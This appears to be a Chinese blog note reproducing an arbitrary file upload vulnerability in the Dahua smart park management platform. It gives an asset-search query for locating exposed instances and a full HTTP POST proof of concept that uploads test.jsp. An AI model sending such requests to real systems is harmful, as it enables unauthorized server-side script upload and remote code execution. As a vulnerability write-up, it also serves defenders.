【1day】复现大华智慧园区综合管理平台任意文件上传漏洞
发布时间
阅读量:
阅读量
该平台存在安全漏洞,允许攻击者上传未验证的文件(如恶意脚本),影响版本数据缺失且未提供详细信息。通过资产测绘发现平台名称为“Dahua 大华 智慧园区管理平台”,并成功复现漏洞:通过POST请求上传测试.jsp文件并获取响应码,并附带截图作为证据。
注:本文记录自作者的学习笔记内容。请注意以下事项:请避免在文章内容范围内使用任何可能用于非法测试的技术手段;如若由此引发的所有潜在问题与笔者无关。
目录
一、漏洞描述
二、影响版本
三、资产测绘
四、漏洞复现
一、漏洞描述
大华智慧园区综合管理平台是一个整合智能化、信息化、网络化与安全化的智慧园区管理平台,在为企业提供全方位解决方案的同时涵盖了安防监控、能源优化、环境监测、人员调度以及停车管理等多个核心领域。当用户试图上传文件至其存储系统时,请注意这些文件未经验证就可能包含恶意内容如文件名、类型、内容或大小等关键信息。若未能遵循系统设置中的安全规范,则即使最基础的文件上传功能也可能被滥用来传播任意潜在有害的文件资源,其中可能包含远程代码执行所需的服务器端脚本文件等严重威胁。
二、影响版本
不详

三、资产测绘
app.name="Dahua 大华 智慧园区管理平台"
四、漏洞复现
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Java/1.8.0_345
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 243
Connection: close
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--


全部评论 (0)
还没有任何评论哟~
